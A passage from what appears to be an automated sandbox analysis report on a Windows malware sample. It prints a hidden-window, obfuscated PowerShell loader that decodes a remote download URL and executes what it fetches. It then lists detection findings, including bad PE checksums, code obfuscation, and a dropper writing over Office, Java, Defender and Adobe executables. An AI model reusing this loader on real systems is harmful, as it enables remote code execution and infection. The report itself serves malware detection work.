efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove Jump to behavior
Binary contains a suspicious time stamp
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
PE file contains an invalid checksum
Source: armsvc.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x38ee8
Source: AppVDllSurrogate.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: Au3Check.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4ace1
Source: AutoIt3_x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x11706f
Source: UcMapi.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x132706
Source: javaw.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x5043b
Source: accicons.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4235e8
Source: Au3Info_x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x49bdd
Source: lync99.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc9dfe
Source: misc.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x10df2d
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x319ee
Source: jaureg.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x95cbf
Source: jucheck.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x138baf
Source: Aut2exe_x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1c7652
Source: AutoIt3Help.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2942f
Source: aimgr.exe0.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2e51b
Source: AppSharingHookController.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x25428
Source: msoadfsb.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1a9457
Source: Microsoft.Mashup.Container.Loader.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x218c6
Source: MpDlpCmd.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x74f87
Source: Aut2exe.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1997a9
Source: dbcicons.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
Source: OfficeScrBroker.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xa8883
Source: Uninstall.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1d811
Source: OcPubMgr.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x182a45
Source: chrome.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
Source: ConfigSecurityPolicy.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x8624f
Source: MpCopyAccelerator.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3e54a
Source: OLicenseHeartbeat.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
Source: Au3Info.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
Source: MpCmdRun.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x19b52e
Source: ai.exe0.10.dr Static PE information: real checksum: 0x8a074 should be: 0xa200f
Source: SQLDumper.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x49b60
Source: VC_redist.x64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xaff0b
Source: Wordconv.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1f925
Source: msoasb.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4d8e4
Source: AppSharingHookController64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x20765
Source: AppVLP.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x710ec
Source: grv_icons.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x646fd
Source: AdobeARMHelper.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x64c50
Source: MpCmdRun.exe0.10.dr Static PE information: real checksum: 0x8a074 should be: 0x146cda
Source: SDXHelper.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x38c81
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x192161
Source: msoev.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x268d3
Source: upx.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x5c64b
Source: ai.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc328b
Source: MsMpEng.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x39d03
Source: jusched.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc76e3
Source: AppVDllSurrogate64.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x4ec22
Source: Integrator.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: PerfBoost.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x6ed59
Source: SciTE.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x25609f
Source: AppVDllSurrogate32.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: mpextms.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xee9bf
Source: aimgr.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x3b0de
Source: integrator.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: java.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x5013a
Source: joticon.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
Source: OfficeScrSanBroker.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0xc392a
Source: VSTOInstaller.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x23068
Source: NisSrv.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x307019
Source: officeappguardwin32.exe.10.dr Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
PE file contains sections with non-standard names
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: section name: .didat
Source: lync99.exe.10.dr Static PE information: section name: .didat
Source: misc.exe.10.dr Static PE information: section name: .didat
Source: msoadfsb.exe.10.dr Static PE information: section name: .didat
Source: msoasb.exe.10.dr Static PE information: section name: .didat
Source: msoev.exe.10.dr Static PE information: section name: .didat
Source: AppVDllSurrogate.exe.10.dr Static PE information: section name: .didat
Source: AppVDllSurrogate32.exe.10.dr Static PE information: section name: .didat
Source: OcPubMgr.exe.10.dr Static PE information: section name: .didat
Source: AppVDllSurrogate64.exe.10.dr Static PE information: section name: .didat
Source: AppVLP.exe.10.dr Static PE information: section name: .didat
Source: Integrator.exe.10.dr Static PE information: section name: .didat
Source: Microsoft.Mashup.Container.Loader.exe.10.dr Static PE information: section name: .didat
Source: AppSharingHookController.exe.10.dr Static PE information: section name: .didat
Source: officeappguardwin32.exe.10.dr Static PE information: section name: .didat
Source: OfficeScrBroker.exe.10.dr Static PE information: section name: .didat
Source: OfficeScrSanBroker.exe.10.dr Static PE information: section name: .didat
Source: PerfBoost.exe.10.dr Static PE information: section name: .didat
Source: MpCmdRun.exe.10.dr Static PE information: section name: .didat
Source: MpDlpCmd.exe.10.dr Static PE information: section name: .didat
Source: mpextms.exe.10.dr Static PE information: section name: .didat
Source: MsMpEng.exe.10.dr Static PE information: section name: .didat
Source: NisSrv.exe.10.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.10.dr Static PE information: section name: .didat
Source: SDXHelper.exe.10.dr Static PE information: section name: .didat
Source: UcMapi.exe.10.dr Static PE information: section name: .didat
Source: Wordconv.exe.10.dr Static PE information: section name: .didat
Source: VC_redist.x64.exe.10.dr Static PE information: section name: .didat
Source: integrator.exe.10.dr Static PE information: section name: .didat
Source: ConfigSecurityPolicy.exe.10.dr Static PE information: section name: .didat
Source: MpCopyAccelerator.exe.10.dr Static PE information: section name: .didat
Source: chrome.exe.10.dr Static PE information: section name: .didat
Source: Au3Check.exe.10.dr Static PE information: section name: .didat
Source: Au3Info.exe.10.dr Static PE information: section name: .didat
Source: Au3Info_x64.exe.10.dr Static PE information: section name: .didat
Source: Aut2exe.exe.10.dr Static PE information: section name: .didat
Source: Aut2exe_x64.exe.10.dr Static PE information: section name: .didat
Source: ai.exe.10.dr Static PE information: section name: .didat
Source: aimgr.exe.10.dr Static PE information: section name: .didat
Source: ai.exe0.10.dr Static PE information: section name: .didat
Source: aimgr.exe0.10.dr Static PE information: section name: .didat
Source: upx.exe.10.dr Static PE information: section name: .didat
Source: AutoIt3Help.exe.10.dr Static PE information: section name: .didat
Source: AutoIt3_x64.exe.10.dr Static PE information: section name: .didat
Source: SciTE.exe.10.dr Static PE information: section name: .didat
Source: Uninstall.exe.10.dr Static PE information: section name: .didat
Source: AdobeARMHelper.exe.10.dr Static PE information: section name: .didat
Source: armsvc.exe.10.dr Static PE information: section name: .didat
Source: jaureg.exe.10.dr Static PE information: section name: .didat
Source: jucheck.exe.10.dr Static PE information: section name: .didat
Source: jusched.exe.10.dr Static PE information: section name: .didat
Source: OLicenseHeartbeat.exe.10.dr Static PE information: section name: .didat
Source: AppSharingHookController64.exe.10.dr Static PE information: section name: .didat
Source: SQLDumper.exe.10.dr Static PE information: section name: .didat
Source: accicons.exe.10.dr Static PE information: section name: .didat
Source: dbcicons.exe.10.dr Static PE information: section name: .didat
Source: grv_icons.exe.10.dr Static PE information: section name: .didat
Source: joticon.exe.10.dr Static PE information: section name: .didat
Source: VSTOInstaller.exe.10.dr Static PE information: section name: .didat
Source: java.exe.10.dr Static PE information: section name: .didat
Source: javaw.exe.10.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B88756B push ebx; iretd 2_2_00007FFD9B88756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8874FB push ebx; iretd 2_2_00007FFD9B88756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B880952 push E95B7DD0h; ret 2_2_00007FFD9B8809C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAE3B0 push eax; retf 5_2_02AAE3B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAFE02 push esp; retf 5_2_02AAFE09
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_071C0AB9 push eax; mov dword ptr [esp], ecx 5_2_071C0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_071C08D8 push eax; mov dword ptr [esp], ecx 5_2_071C0AC4

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
